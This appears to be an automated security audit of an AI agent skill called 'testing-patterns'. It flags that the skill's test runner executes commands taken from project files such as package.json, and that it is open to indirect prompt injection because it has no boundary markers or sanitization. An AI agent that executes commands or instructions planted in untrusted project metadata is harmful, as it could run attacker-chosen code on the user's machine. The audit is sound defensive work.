testing-patterns
Warn
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
- COMMAND_EXECUTION (MEDIUM): The file
scripts/test_runner.pyexecutes system commands usingsubprocess.run. It determines the command to run based on the contents of apackage.jsonfile in the provided project path. An attacker could craft a malicious project where the 'test' script executes harmful commands, which this script would then trigger without further validation. - Dynamic Execution (MEDIUM): The
test_runner.pyscript dynamically constructs command lists (e.g.,['npm', 'test']or['npx', 'jest', '--coverage']) based on environment detection. This pattern of building and executing commands from external configuration files is a medium-risk dynamic execution vector as it relies on untrusted metadata to define execution paths. - Indirect Prompt Injection (LOW): The skill is vulnerable to indirect prompt injection via the project files it processes.
- Ingestion points: Reads
package.json,pyproject.toml, andrequirements.txtinscripts/test_runner.pyto determine execution logic. - Boundary markers: None; the script lacks delimiters or warnings to ignore malicious instructions embedded in project metadata.
- Capability inventory:
subprocess.runinscripts/test_runner.pyprovides shell execution capability via the local environment's test runners. - Sanitization: No sanitization of project-defined scripts or command-line arguments extracted from the target project is performed before execution.
Audit Metadata